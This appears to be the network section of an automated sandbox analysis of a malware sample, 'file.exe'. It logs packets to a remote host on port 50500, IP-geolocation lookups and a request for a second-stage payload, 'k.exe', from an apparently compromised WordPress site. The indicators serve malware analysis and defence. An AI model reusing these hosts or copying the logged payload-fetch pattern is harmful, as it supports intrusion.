                                                                        May 12, 2024 12:31:55.729727030 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729739904 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729749918 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729758024 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729770899 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729775906 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729789972 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729794025 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729801893 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729824066 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729825974 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729840994 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729876041 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.729904890 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729917049 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.729959011 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730097055 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730109930 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730124950 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730130911 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730140924 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730150938 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730161905 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730165005 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730181932 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730186939 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730194092 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730214119 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730217934 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730232000 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730253935 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730254889 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730272055 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730283976 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730289936 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730298042 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730304003 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730309963 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730329037 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730345011 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730354071 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730360031 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730376959 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730377913 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730387926 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730413914 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730424881 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730428934 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730442047 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730443001 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730458975 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730470896 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730477095 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730477095 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730483055 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730500937 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730519056 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730523109 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730534077 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730549097 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730566025 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730577946 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730581999 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730597019 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730607986 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730609894 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730618954 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730627060 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730640888 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730645895 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730659008 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730673075 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730684996 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730690956 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730701923 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730709076 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730720997 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730735064 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730736017 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730751991 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730765104 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730766058 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730819941 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.806763887 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:56.170089006 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:56.170161963 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:56.533299923 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:56.571336985 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:56.934916973 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:56.935048103 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:57.350653887 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:57.602083921 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:57.652494907 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:57.991442919 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:57.993104935 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:58.871303082 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:59.965122938 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:00.350857019 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:32:00.402479887 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:30.746364117 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:31.141252041 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:32:31.183825016 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:46.840226889 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:47.234889030 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:32:47.277584076 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:53.482594013 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:53.867929935 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:32:53.918323040 CEST4972450500192.168.2.55.42.96.65
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2024 12:30:57.505943060 CEST | 57762 | 53 | 192.168.2.5 | 1.1.1.1
May 12, 2024 12:30:57.676301956 CEST | 53 | 57762 | 1.1.1.1 | 192.168.2.5
May 12, 2024 12:30:58.398008108 CEST | 50604 | 53 | 192.168.2.5 | 1.1.1.1
May 12, 2024 12:30:58.561959982 CEST | 53 | 50604 | 1.1.1.1 | 192.168.2.5
May 12, 2024 12:31:48.406987906 CEST | 64506 | 53 | 192.168.2.5 | 1.1.1.1
May 12, 2024 12:31:49.007366896 CEST | 53 | 64506 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 12, 2024 12:30:57.505943060 CEST | 192.168.2.5 | 1.1.1.1 | 0x9a5e | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
May 12, 2024 12:30:58.398008108 CEST | 192.168.2.5 | 1.1.1.1 | 0x2db7 | Standard query (0) | db-ip.com | A (IP address) | IN (0x0001) | false
May 12, 2024 12:31:48.406987906 CEST | 192.168.2.5 | 1.1.1.1 | 0xe086 | Standard query (0) | easy2buy.ae | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 12, 2024 12:30:57.676301956 CEST | 1.1.1.1 | 192.168.2.5 | 0x9a5e | No error (0) | ipinfo.io | | 34.117.186.192 | A (IP address) | IN (0x0001) | false
May 12, 2024 12:30:58.561959982 CEST | 1.1.1.1 | 192.168.2.5 | 0x2db7 | No error (0) | db-ip.com | | 172.67.75.166 | A (IP address) | IN (0x0001) | false
May 12, 2024 12:30:58.561959982 CEST | 1.1.1.1 | 192.168.2.5 | 0x2db7 | No error (0) | db-ip.com | | 104.26.5.15 | A (IP address) | IN (0x0001) | false
May 12, 2024 12:30:58.561959982 CEST | 1.1.1.1 | 192.168.2.5 | 0x2db7 | No error (0) | db-ip.com | | 104.26.4.15 | A (IP address) | IN (0x0001) | false
May 12, 2024 12:31:49.007366896 CEST | 1.1.1.1 | 192.168.2.5 | 0xe086 | No error (0) | easy2buy.ae | | 185.199.220.53 | A (IP address) | IN (0x0001) | false

• https:
  • ipinfo.io
• db-ip.com
• easy2buy.ae
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49719 | 185.199.220.53 | 80 | 2608 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
May 12, 2024 12:31:49.309426069 CEST | 169 | OUT | Data Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 40 9a 94 a2 f7 ec 2e 34 5a 35 64 8b fd bc e9 db 44 bc 57 70 43 45 b5 77 4c a0 96 86 e5 b3 28 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
Data Ascii: f@.4Z5dDWpCEwL(&,+0/$#('=<5/Qeasy2buy.ae#
May 12, 2024 12:31:49.609438896 CEST | 948 | IN | HTTP/1.1 405 Method Not Allowed
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 702
date: Sun, 12 May 2024 10:31:49 GMT
server: LiteSpeed
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 405 Method Not Allowed</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">405</h1><h2 style="margin-top:20px;font-size: 30px;">Method Not Allowed</h2><p>This type request is not allowed!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49720 | 185.199.220.53 | 80 | 2608 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
May 12, 2024 12:31:49.912662029 CEST | 115 | OUT | Data Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 40 9a 95 bb 3e 44 41 a0 8b 77 52 b5 98 a3 57 3c db ea 5a 11 ab 20 a6 77 0a 95 bd 1c dc 7c 6a 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 65 61 73 79 32 62 75 79 2e
Data Ascii: njf@>DAwRW<Z w|j5/3easy2buy.ae#
May 12, 2024 12:31:50.211469889 CEST | 948 | IN | HTTP/1.1 405 Method Not Allowed
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 702
date: Sun, 12 May 2024 10:31:50 GMT
server: LiteSpeed
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 405 Method Not Allowed</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">405</h1><h2 style="margin-top:20px;font-size: 30px;">Method Not Allowed</h2><p>This type request is not allowed!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 34.117.186.192 | 443 | 2608 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:30:58 UTC | 237 | OUT | GET /widget/demo/81.181.60.11 HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: ipinfo.io
2024-05-12 10:30:58 UTC | 513 | IN | HTTP/1.1 200 OK
server: nginx/1.24.0
date: Sun, 12 May 2024 10:30:58 GMT
content-type: application/json; charset=utf-8
Content-Length: 985
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
x-envoy-upstream-service-time: 2
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                        2024-05-12 10:30:58 UTC  742 bytes  IN  Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 31 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 31 31 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 53 65 61 74 74 6c 65 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 36 30 36 32 2c 2d 31 32 32 2e 33 33 32 31 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 39 38 31 30 31 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72
                                                                        Data Ascii: { "input": "81.181.60.11", "data": { "ip": "81.181.60.11", "city": "Seattle", "region": "Washington", "country": "US", "loc": "47.6062,-122.3321", "org": "AS212238 Datacamp Limited", "postal": "98101", "timezone": "Amer
                                                                        2024-05-12 10:30:58 UTC  243 bytes  IN  Data Raw: 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                        Data Ascii: "address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        1           192.168.2.5  49708        172.67.75.166   443               2608  C:\Users\user\Desktop\file.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                        2024-05-12 10:30:58 UTC  261 bytes  OUT  GET /demo/home.php?s=81.181.60.11 HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                        Host: db-ip.com
                                                                        2024-05-12 10:30:59 UTC  656 bytes  IN  HTTP/1.1 200 OK
                                                                        Date: Sun, 12 May 2024 10:30:59 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        x-iplb-request-id: AC4417BB:7DAA_93878F2E:0050_66409A63_CDD4269:7B63
                                                                        x-iplb-instance: 59128
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LetULO1IO%2BWWtilwAfCHJzplUPgQCmwi%2FA%2BYFwgWcDE7I02tZkwL3UzWIKK3L4iKmMGbzW6WUV5JTVnA%2BABK9o5c3YVP4lPAzl3zx9P2bdWmYSuQhzyy819KkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8829bc8bec6c7624-SEA
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-05-12 10:30:59 UTC  85 bytes  IN  Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                        Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                                        2024-05-12 10:30:59 UTC  5 bytes  IN  Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                        2           192.168.2.5  49722        185.199.220.53  443               2608  C:\Users\user\Desktop\file.exe
                                                                        Timestamp  Bytes transferred  Direction  Data
                                                                        2024-05-12 10:31:51 UTC  229 bytes  OUT  GET /wp-content/upgrade/k.exe HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                                                        Host: easy2buy.ae
                                                                        Cache-Control: no-cache
                                                                        2024-05-12 10:31:52 UTC  522 bytes  IN  HTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        link: <https://easy2buy.ae/wp-json/>; rel="https://api.w.org/"
                                                                        transfer-encoding: chunked
                                                                        date: Sun, 12 May 2024 10:31:52 GMT
                                                                        server: LiteSpeed
                                                                        vary: User-Agent
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2024-05-12 10:31:52 UTC  846 bytes  IN  Data Raw: 38 62 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 78 6d 6c 72 70 63
                                                                        Data Ascii: 8b39<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="https://easy2buy.ae/xmlrpc
                                                                        2024-05-12 10:31:52 UTC  14994 bytes  IN  Data Raw: 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 7d 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 22 7d 5d 2c 22 69
                                                                        Data Ascii: iption":"","publisher":{"@id":"https://easy2buy.ae/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://easy2buy.ae/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"i
                                                                        2024-05-12 10:31:52 UTC  16384 bytes  IN  Data Raw: 69 6d 65 6c 69 6e 65 2e 71 6f 64 65 66 2d 70 6f 69 6e 74 2d 2d 64 69 61 6d 6f 6e 64 20 2e 71 6f 64 65 66 2d 65 2d 70 6f 69 6e 74 2d 68 6f 6c 64 65 72 3a 62 65 66 6f 72 65 2c 20 2e 71 6f 64 65 66 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 2d 34 65 33 37 35 31 34 35 20 2e 71 69 2d 62 6c 6f 63 6b 2d 74 69 6d 65 6c 69 6e 65 2e 71 6f 64 65 66 2d 70 6f 69 6e 74 2d 2d 64 69 61 6d 6f 6e 64 20 2e 71 6f 64 65 66 2d 65 2d 70 6f 69 6e 74 2d 68 6f 6c 64 65 72 3a 61 66 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 62 65 62 65 62 3b 7d 20 62 6f 64 79 20 20 2e 71 6f 64 65 66 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 2d 34 65 33 37 35 31 34 35 20 2e 71 69 2d 62 6c 6f 63 6b 2d 74 69 6d 65 6c 69 6e 65 20 2e 71 6f 64 65 66 2d 65 2d 70 6f 69 6e 74 7b 62 61
                                                                        Data Ascii: imeline.qodef-point--diamond .qodef-e-point-holder:before, .qodef-widget-block-4e375145 .qi-block-timeline.qodef-point--diamond .qodef-e-point-holder:after{background-color: #ebebeb;} body .qodef-widget-block-4e375145 .qi-block-timeline .qodef-e-point{ba
                                                                        2024-05-12 10:31:52 UTC  3425 bytes  IN  Data Raw: 2d 74 79 70 65 3a 20 64 69 73 63 3b 7d 20 62 6f 64 79 20 20 2e 71 6f 64 65 66 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 2d 38 66 64 64 31 64 65 61 20 2e 71 69 2d 62 6c 6f 63 6b 2d 74 61 67 2d 63 6c 6f 75 64 20 2e 71 6f 64 65 66 2d 65 2d 69 74 65 6d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 36 70 78 3b 7d 20 62 6f 64 79 20 20 2e 71 6f 64 65 66 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 2d 39 31 36 61 32 66 62 66 20 2e 71 69 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2d 6f 66 2d 63 6f 6e 74 65 6e 74 73 20 2e 71 6f 64 65 66 2d 6d 2d 74 61 62 6c 65 2d 63 6f 6e 74 65 6e 74 20 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 20 64 69 73 63 3b 7d 20 62 6f 64 79 20 20 2e 71 6f 64 65 66 2d 77
                                                                        Data Ascii: -type: disc;} body .qodef-widget-block-8fdd1dea .qi-block-tag-cloud .qodef-e-item{text-decoration: underline;font-size: 26px;} body .qodef-widget-block-916a2fbf .qi-block-table-of-contents .qodef-m-table-content ul{list-style-type: disc;} body .qodef-w
